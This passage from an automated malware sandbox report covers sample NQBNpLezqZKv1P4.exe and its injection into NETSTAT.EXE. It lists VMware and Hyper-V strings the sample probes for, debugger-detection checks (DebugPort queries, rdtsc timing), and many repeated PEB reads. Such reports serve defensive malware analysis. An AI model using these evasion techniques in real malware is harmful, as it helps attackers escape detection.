Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.748781487.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NQBNpLezqZKv1P4.exe Binary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000005.00000000.725971847.000000000FD86000.00000004.00000001.sdmp Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}TT
Source: explorer.exe, 00000005.00000000.745709839.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.721588911.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_004088A0 rdtsc 4_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00409B10 LdrLoadDll, 4_2_00409B10
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343DB40 mov eax, dword ptr fs:[00000030h] 10_2_0343DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344EF40 mov eax, dword ptr fs:[00000030h] 10_2_0344EF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508B58 mov eax, dword ptr fs:[00000030h] 10_2_03508B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343F358 mov eax, dword ptr fs:[00000030h] 10_2_0343F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343DB60 mov ecx, dword ptr fs:[00000030h] 10_2_0343DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344FF60 mov eax, dword ptr fs:[00000030h] 10_2_0344FF60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508F6A mov eax, dword ptr fs:[00000030h] 10_2_03508F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h] 10_2_03463B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h] 10_2_03463B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h] 10_2_0346A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h] 10_2_0346A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345F716 mov eax, dword ptr fs:[00000030h] 10_2_0345F716
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F131B mov eax, dword ptr fs:[00000030h] 10_2_034F131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h] 10_2_034CFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h] 10_2_034CFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0350070D mov eax, dword ptr fs:[00000030h] 10_2_0350070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0350070D mov eax, dword ptr fs:[00000030h] 10_2_0350070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h] 10_2_03434F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h] 10_2_03434F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346E730 mov eax, dword ptr fs:[00000030h] 10_2_0346E730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h] 10_2_034B53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h] 10_2_034B53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h] 10_2_034603E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034737F5 mov eax, dword ptr fs:[00000030h] 10_2_034737F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F138A mov eax, dword ptr fs:[00000030h] 10_2_034F138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h] 10_2_03441B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h] 10_2_03441B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034ED380 mov ecx, dword ptr fs:[00000030h] 10_2_034ED380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03448794 mov eax, dword ptr fs:[00000030h] 10_2_03448794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462397 mov eax, dword ptr fs:[00000030h] 10_2_03462397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346B390 mov eax, dword ptr fs:[00000030h] 10_2_0346B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h] 10_2_034B7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h] 10_2_034B7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h] 10_2_034B7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h] 10_2_03464BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h] 10_2_03464BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h] 10_2_03464BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03505BA5 mov eax, dword ptr fs:[00000030h] 10_2_03505BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439240 mov eax, dword ptr fs:[00000030h] 10_2_03439240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439240 mov eax, dword ptr fs:[00000030h] 10_2_03439240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439240 mov eax, dword ptr fs:[00000030h] 10_2_03439240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439240 mov eax, dword ptr fs:[00000030h] 10_2_03439240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h] 10_2_03447E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034C4257 mov eax, dword ptr fs:[00000030h] 10_2_034C4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344766D mov eax, dword ptr fs:[00000030h] 10_2_0344766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h] 10_2_034EB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h] 10_2_034EB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508A62 mov eax, dword ptr fs:[00000030h] 10_2_03508A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h] 10_2_0345AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h] 10_2_0345AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h] 10_2_0345AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h] 10_2_0345AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h] 10_2_0345AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347927A mov eax, dword ptr fs:[00000030h] 10_2_0347927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h] 10_2_0343C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h] 10_2_0343C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h] 10_2_0343C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03468E00 mov eax, dword ptr fs:[00000030h] 10_2_03468E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03448A0A mov eax, dword ptr fs:[00000030h] 10_2_03448A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h] 10_2_0343AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h] 10_2_0343AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03453A1C mov eax, dword ptr fs:[00000030h] 10_2_03453A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h] 10_2_0346A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h] 10_2_0346A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343E620 mov eax, dword ptr fs:[00000030h] 10_2_0343E620
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h] 10_2_03474A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h] 10_2_03474A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034EFE3F mov eax, dword ptr fs:[00000030h] 10_2_034EFE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03478EC7 mov eax, dword ptr fs:[00000030h] 10_2_03478EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508ED6 mov eax, dword ptr fs:[00000030h] 10_2_03508ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034636CC mov eax, dword ptr fs:[00000030h] 10_2_034636CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462ACB mov eax, dword ptr fs:[00000030h] 10_2_03462ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034EFEC0 mov eax, dword ptr fs:[00000030h] 10_2_034EFEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462AE4 mov eax, dword ptr fs:[00000030h] 10_2_03462AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034616E0 mov ecx, dword ptr fs:[00000030h] 10_2_034616E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034476E2 mov eax, dword ptr fs:[00000030h] 10_2_034476E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CFE87 mov eax, dword ptr fs:[00000030h] 10_2_034CFE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h] 10_2_0346D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h] 10_2_0346D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h] 10_2_034352A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h] 10_2_034352A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h] 10_2_034352A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h] 10_2_034352A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h] 10_2_034352A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B46A7 mov eax, dword ptr fs:[00000030h] 10_2_034B46A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0344AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h] 10_2_0344AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h] 10_2_03500EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h] 10_2_03500EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h] 10_2_03500EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346FAB0 mov eax, dword ptr fs:[00000030h] 10_2_0346FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h] 10_2_0345B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h] 10_2_0345B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03473D43 mov eax, dword ptr fs:[00000030h] 10_2_03473D43
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B3540 mov eax, dword ptr fs:[00000030h] 10_2_034B3540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03457D50 mov eax, dword ptr fs:[00000030h] 10_2_03457D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343C962 mov eax, dword ptr fs:[00000030h] 10_2_0343C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h] 10_2_0343B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h] 10_2_0343B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h] 10_2_0345C577
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h] 10_2_0345C577
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439100 mov eax, dword ptr fs:[00000030h] 10_2_03439100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439100 mov eax, dword ptr fs:[00000030h] 10_2_03439100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03439100 mov eax, dword ptr fs:[00000030h] 10_2_03439100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03508D34 mov eax, dword ptr fs:[00000030h] 10_2_03508D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 mov eax, dword ptr fs:[00000030h] 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 mov eax, dword ptr fs:[00000030h] 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 mov eax, dword ptr fs:[00000030h] 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 mov eax, dword ptr fs:[00000030h] 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 mov ecx, dword ptr fs:[00000030h] 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h] 10_2_03443D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343AD30 mov eax, dword ptr fs:[00000030h] 10_2_0343AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346513A mov eax, dword ptr fs:[00000030h] 10_2_0346513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346513A mov eax, dword ptr fs:[00000030h] 10_2_0346513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034BA537 mov eax, dword ptr fs:[00000030h] 10_2_034BA537
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h] 10_2_03464D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h] 10_2_03464D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h] 10_2_03464D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0343B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0343B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0343B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034C41E8 mov eax, dword ptr fs:[00000030h] 10_2_034C41E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h] 10_2_0344D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h] 10_2_0344D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034E8DF1 mov eax, dword ptr fs:[00000030h] 10_2_034E8DF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A185 mov eax, dword ptr fs:[00000030h] 10_2_0346A185
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345C182 mov eax, dword ptr fs:[00000030h] 10_2_0345C182
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462581 mov eax, dword ptr fs:[00000030h] 10_2_03462581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462581 mov eax, dword ptr fs:[00000030h] 10_2_03462581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462581 mov eax, dword ptr fs:[00000030h] 10_2_03462581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462581 mov eax, dword ptr fs:[00000030h] 10_2_03462581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h] 10_2_03432D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h] 10_2_03432D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h] 10_2_03432D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h] 10_2_03432D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h] 10_2_03432D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462990 mov eax, dword ptr fs:[00000030h] 10_2_03462990
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h] 10_2_0346FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h] 10_2_0346FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h] 10_2_034661A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h] 10_2_034661A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034635A1 mov eax, dword ptr fs:[00000030h] 10_2_034635A1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B69A6 mov eax, dword ptr fs:[00000030h] 10_2_034B69A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h] 10_2_03461DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h] 10_2_03461DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h] 10_2_03461DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h] 10_2_034B51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h] 10_2_034B51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h] 10_2_034B51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h] 10_2_034B51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346A44B mov eax, dword ptr fs:[00000030h] 10_2_0346A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03450050 mov eax, dword ptr fs:[00000030h] 10_2_03450050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03450050 mov eax, dword ptr fs:[00000030h] 10_2_03450050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h] 10_2_034CC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h] 10_2_034CC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03501074 mov eax, dword ptr fs:[00000030h] 10_2_03501074
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0345746D mov eax, dword ptr fs:[00000030h] 10_2_0345746D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F2073 mov eax, dword ptr fs:[00000030h] 10_2_034F2073
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h] 10_2_034B6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h] 10_2_034B6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h] 10_2_034B6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h] 10_2_034B6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03504015 mov eax, dword ptr fs:[00000030h] 10_2_03504015
